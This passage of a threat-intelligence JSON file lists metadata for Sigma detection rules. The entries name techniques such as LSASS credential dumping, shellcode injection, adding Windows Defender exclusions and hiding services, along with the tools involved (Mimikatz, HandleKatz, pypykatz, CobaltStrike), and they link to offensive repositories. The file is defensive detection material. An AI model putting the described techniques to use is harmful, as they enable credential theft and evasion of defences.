configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)", - "uuid": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "value": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "meta": { - "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", - "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" - ], - "creation_date": "2022/10/17", - "filename": "posh_ps_using_set_service_to_hide_services.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Rare intended use of hidden services", - "Rare FP could occure due to the non linearity of the ScriptBlockText log" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell logs", - "uuid": "1139d2e2-84b1-4226-b445-354492eba8ba", - "value": "Usage Of Web Request Commands And Cmdlets - PowerShell", - "meta": { - "refs": [ - "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", - "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/10/24", - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml", - "author": "James Pemberton / @4A616D6573", - "level": "medium", - "falsepositive": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
- ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class", - "uuid": "91109523-17f0-4248-a800-f81d9e7c081d", - "value": "PowerShell WMI Win32_Product Install MSI", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win32_product_install_msi.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.007" - ], - "creation_date": "2022/04/24", - "filename": "posh_ps_win32_product_install_msi.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", - "uuid": "488b44e7-3781-4a71-888d-c95abfacf44d", - "value": "Windows Firewall Profile Disabled", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", - "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", - "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", - "http://woshub.com/manage-windows-firewall-powershell/", - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.004" - ], - "creation_date": "2021/10/12", - "filename": "posh_ps_windows_firewall_profile_disabled.yml", - "author": "Austin Songer @austinsonger", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - 
"logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\nRegistry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are\nused to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to\nload and execute malicious DLLs and/or executables.\n", - "uuid": "851c506b-6b7c-4ce2-8802-c703009d03c0", - "value": "Winlogon Helper DLL", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ], - "creation_date": "2019/10/21", - "filename": "posh_ps_winlogon_helper_dll.yml", - "author": "Timur Zinniatullin, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", - "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", - "value": "Windows Defender Exclusions Added - PowerShell", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562", - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/09/16", - "filename": 
"posh_ps_win_defender_exclusions_added.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects parameters used by WMImplant", - "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", - "value": "WMImplant Hack Tool", - "meta": { - "refs": [ - "https://github.com/FortyNorthSecurity/WMImplant", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1059.001" - ], - "creation_date": "2020/03/26", - "filename": "posh_ps_wmimplant.yml", - "author": "NVISO", - "level": "high", - "falsepositive": [ - "Administrative scripts that use the same keywords." - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", - "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", - "value": "Powershell WMI Persistence", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1546.003" - ], - "creation_date": "2021/08/19", - "filename": "posh_ps_wmi_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects known WMI recon method to look for unquoted service 
paths, often used by pentest inside of powershell scripts attackers enum scripts", - "uuid": "09658312-bc27-4a3b-91c5-e49ab9046d1b", - "value": "WMIC Unquoted Services Path Lookup - PowerShell", - "meta": { - "refs": [ - "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", - "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047" - ], - "creation_date": "2022/06/20", - "filename": "posh_ps_wmi_unquoted_service_search.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", - "value": "Powershell XML Execute Command", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/01/19", - "filename": "posh_ps_xml_iex.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate administrative script" - ], - "logsource.category": "ps_script", - "logsource.product": "windows" - } - }, - { - "description": "Detects shellcode injection by Metasploit's migrate and Empire's psinject", - "uuid": "250ae82f-736e-4844-a68b-0b5e8cc887da", - "value": "Shellcode Injection", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2022/03/11", - "filename": "process_access_win_shellcode_inject_msf_empire.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious access to Lsass handle via a call trace to \"seclogon.dll\"", - "uuid": "472159c5-31b9-4f56-b794-b766faa8b0a7", - "value": "Suspicious LSASS Access Via MalSecLogon", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1541920424635912196", - 
"https://github.com/elastic/detection-rules/blob/2bc1795f3d7bcc3946452eb4f07ae799a756d94e/rules/windows/credential_access_lsass_handle_via_malseclogon.toml", - "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/process_access_win_susp_seclogon.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/06/29", - "filename": "process_access_win_susp_seclogon.yml", - "author": "Samir Bousseaden (original elastic rule), Nasreddine Bencherchali (sigma)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "uuid": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "value": "CMSTP Execution Process Access", - "meta": { - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cmstp_execution_by_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.003", - "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" - ], - "creation_date": "2018/07/16", - "filename": "proc_access_win_cmstp_execution_by_access.yml", - "author": "Nik Seetharaman", - "level": "high", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "uuid": "09706624-b7f6-455d-9d02-adee024cee1d", - "value": "CobaltStrike BOF Injection Pattern", - "meta": { - "refs": [ - 
"https://github.com/boku7/injectAmsiBypass", - "https://github.com/boku7/spawn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cobaltstrike_bof_injection_pattern.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/08/04", - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_access", - "logsource.product": "windows" - } - }, - { - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "uuid": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "value": "Credential Dumping Tools Accessing LSASS Memory", - "meta": { - "refs": [ - "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow", - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_cred_dump_lsass_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" - ], - "creation_date": "2017/02/16", - "filename": "proc_access_win_cred_dump_lsass_access.yml", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community (update)", - "level": "high", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; please add more filters" - ], - 
"logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.",
- "uuid": "3f3f3506-1895-401b-9cc3-e86b16e630d0",
- "value": "Direct Syscall of NtOpenProcess",
- "meta": {
- "refs": [
- "https://medium.com/falconforce/falconfriday-direct-system-calls-and-cobalt-strike-bofs-0xff14-741fa8e1bdd6",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_direct_syscall_ntopenprocess.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1106"
- ],
- "creation_date": "2021/07/28",
- "filename": "proc_access_win_direct_syscall_ntopenprocess.yml",
- "author": "Christian Burkard, Tim Shelton",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon",
- "uuid": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e",
- "value": "SysmonEnte Usage",
- "meta": {
- "refs": [
- "https://codewhitesec.blogspot.com/2022/09/attacks-on-sysmon-revisited-sysmonente.html",
- "https://github.com/codewhitesec/SysmonEnte/",
- "https://github.com/codewhitesec/SysmonEnte/blob/main/screens/1.png",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_hack_sysmonente.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.002"
- ],
- "creation_date": "2022/09/07",
- "filename": "proc_access_win_hack_sysmonente.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles",
- "uuid": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5",
- "value": "HandleKatz Duplicating LSASS 
Handle",
- "meta": {
- "refs": [
- "https://github.com/codewhitesec/HandleKatz",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_handlekatz_lsass_access.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1106",
- "attack.defense_evasion",
- "attack.t1003.001"
- ],
- "creation_date": "2022/06/27",
- "filename": "proc_access_win_handlekatz_lsass_access.yml",
- "author": "Bhabesh Raj (rule), @thefLinkk",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects suspect access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.",
- "uuid": "166e9c50-8cd9-44af-815d-d1f0c0e90dde",
- "value": "Suspect Svchost Memory Asccess",
- "meta": {
- "refs": [
- "https://github.com/hlldz/Invoke-Phant0m",
- "https://twitter.com/timbmsft/status/900724491076214784",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_invoke_phantom.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1562.002"
- ],
- "creation_date": "2020/01/02",
- "filename": "proc_access_win_invoke_phantom.yml",
- "author": "Tim Burrell",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects LSASS process access by LaZagne for credential dumping.",
- "uuid": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0",
- "value": "Credential Dumping by LaZagne",
- "meta": {
- "refs": [
- "https://twitter.com/bh4b3sh/status/1303674603819081728",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lazagne_cred_dump_lsass_access.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.s0349"
- ],
- "creation_date": "2020/09/09",
- "filename": 
"proc_access_win_lazagne_cred_dump_lsass_access.yml",
- "author": "Bhabesh Raj, Jonhnathan Ribeiro",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects the process injection of a LittleCorporal generated Maldoc.",
- "uuid": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac",
- "value": "LittleCorporal Generated Maldoc Injection",
- "meta": {
- "refs": [
- "https://github.com/connormcgarr/LittleCorporal",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_littlecorporal_generated_maldoc.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1204.002",
- "attack.t1055.003"
- ],
- "creation_date": "2021/08/09",
- "filename": "proc_access_win_littlecorporal_generated_maldoc.yml",
- "author": "Christian Burkard",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.",
- "uuid": "fb3722e4-1a06-46b6-b772-253e2e7db933",
- "value": "Load Undocumented Autoelevated COM Interface",
- "meta": {
- "refs": [
- "https://www.snip2code.com/Snippet/4397378/UAC-bypass-using-EditionUpgradeManager-C/",
- "https://gist.github.com/hfiref0x/de9c83966623236f5ebf8d9ae2407611",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_load_undocumented_autoelevated_com_interface.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1548.002"
- ],
- "creation_date": "2020/10/07",
- "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml",
- "author": "oscd.community, Dmitry Uchakin",
- "level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects 
adversaries leveraging the MiniDump export function from comsvcs.dll via rundll32 to perform a memory dump from lsass.",
- "uuid": "a49fa4d5-11db-418c-8473-1e014a8dd462",
- "value": "Lsass Memory Dump via Comsvcs DLL",
- "meta": {
- "refs": [
- "https://twitter.com/shantanukhande/status/1229348874298388484",
- "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ],
- "creation_date": "2020/10/20",
- "filename": "proc_access_win_lsass_dump_comsvcs_dll.yml",
- "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.",
- "uuid": "5ef9853e-4d0e-4a70-846f-a9ca37d876da",
- "value": "LSASS Memory Dump",
- "meta": {
- "refs": [
- "https://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html",
- "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.001/T1003.001.md",
- "https://research.splunk.com/endpoint/windows_possible_credential_dumping/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.s0002"
- ],
- "creation_date": "2019/04/03",
- "filename": "proc_access_win_lsass_memdump.yml",
- "author": "Samir Bousseaden, Michael Haag",
- "level": "high",
- "falsepositive": [
- "False 
positives are present when looking for 0x1410. Exclusions may be required."
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference",
- "uuid": "4be8b654-0c01-4c9d-a10c-6b28467fc651",
- "value": "LSASS Access from White-Listed Processes",
- "meta": {
- "refs": [
- "https://twitter.com/_xpn_/status/1491557187168178176",
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz",
- "https://twitter.com/mrd0x/status/1460597833917251595",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_evasion.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.s0002"
- ],
- "creation_date": "2022/02/10",
- "filename": "proc_access_win_lsass_memdump_evasion.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Unlikely, since these tools shouldn't access lsass.exe at all"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process",
- "uuid": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3",
- "value": "LSASS Memory Access by Tool Named Dump",
- "meta": {
- "refs": [
- "https://twitter.com/_xpn_/status/1491557187168178176",
- "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_memdump_indicators.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.s0002"
- ],
- "creation_date": "2022/02/10",
- "filename": 
"proc_access_win_lsass_memdump_indicators.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Rare programs that contain the word dump in their name and access lsass"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.",
- "uuid": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7",
- "value": "WerFault Accassing LSASS",
- "meta": {
- "refs": [
- "https://github.com/helpsystems/nanodump/commit/578116faea3d278d53d70ea932e2bbfe42569507",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_lsass_werfault.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.s0002"
- ],
- "creation_date": "2012/06/27",
- "filename": "proc_access_win_lsass_werfault.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Actual failures in lsass.exe that trigger a crash dump (unlikely)",
- "Unknown cases in which WerFault accesses lsass.exe"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro",
- "uuid": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1",
- "value": "Malware Shellcode in Verclsid Target Process",
- "meta": {
- "refs": [
- "https://twitter.com/JohnLaTwC/status/837743453039534080",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_malware_verclsid_shellcode.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.privilege_escalation",
- "attack.t1055"
- ],
- "creation_date": "2017/03/04",
- "filename": "proc_access_win_malware_verclsid_shellcode.yml",
- "author": "John Lambert (tech), Florian Roth (rule)",
-
"level": "high",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.",
- "uuid": "aa35a627-33fb-4d04-a165-d33b4afca3e8",
- "value": "Mimikatz through Windows Remote Management",
- "meta": {
- "refs": [
- "https://pentestlab.blog/2018/05/15/lateral-movement-winrm/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_mimikatz_trough_winrm.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.execution",
- "attack.t1003.001",
- "attack.t1059.001",
- "attack.lateral_movement",
- "attack.t1021.006",
- "attack.s0002"
- ],
- "creation_date": "2019/05/20",
- "filename": "proc_access_win_mimikatz_trough_winrm.yml",
- "author": "Patryk Prauze - ING Tech",
- "level": "high",
- "falsepositive": [
- "Unlikely"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects LSASS process access by pypykatz for credential dumping.",
- "uuid": "7186e989-4ed7-4f4e-a656-4674b9e3e48b",
- "value": "Credential Dumping by Pypykatz",
- "meta": {
- "refs": [
- "https://github.com/skelsec/pypykatz",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_pypykatz_cred_dump_lsass_access.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001"
- ],
- "creation_date": "2021/08/03",
- "filename": "proc_access_win_pypykatz_cred_dump_lsass_access.yml",
- "author": "Bhabesh Raj",
- "level": "critical",
- "falsepositive": [
- "Unknown"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects process access to LSASS memory with suspicious access flags 0x410 and 0x01410 (spin-off of similar rule)",
- "uuid": "678dfc63-fefb-47a5-a04c-26bcf8cc9f65",
- "value": "Rare GrantedAccess Flags on 
LSASS Access",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
- "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_rare_proc_access_lsass.yml"
- ],
- "tags": [
- "attack.credential_access",
- "attack.t1003.001",
- "attack.s0002"
- ],
- "creation_date": "2022/03/13",
- "filename": "proc_access_win_rare_proc_access_lsass.yml",
- "author": "Florian Roth",
- "level": "medium",
- "falsepositive": [
- "Legitimate software accessing LSASS process for legitimate reason"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects process access to LSASS memory with suspicious access flags",
- "uuid": "a18dd26b-6450-46de-8c91-9659150cf088",
- "value": "Suspicious GrantedAccess Flags on LSASS Access",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
- "https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow",
- "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html",
- "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment",
- "http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_access/proc_access_win_susp_proc_access_lsass.yml"
- ],
- "tags": [
-
"attack.credential_access",
- "attack.t1003.001",
- "attack.s0002"
- ],
- "creation_date": "2021/11/22",
- "filename": "proc_access_win_susp_proc_access_lsass.yml",
- "author": "Florian Roth",
- "level": "high",
- "falsepositive": [
- "Legitimate software accessing LSASS process for legitimate reason"
- ],
- "logsource.category": "process_access",
- "logsource.product": "windows"
- }
- },
- {
- "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder",
- "uuid": "fa34b441-961a-42fa-a100-ecc28c886725",
- "value": "LSASS Access from Program in Suspicious Folder",
- "meta": {
- "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights",
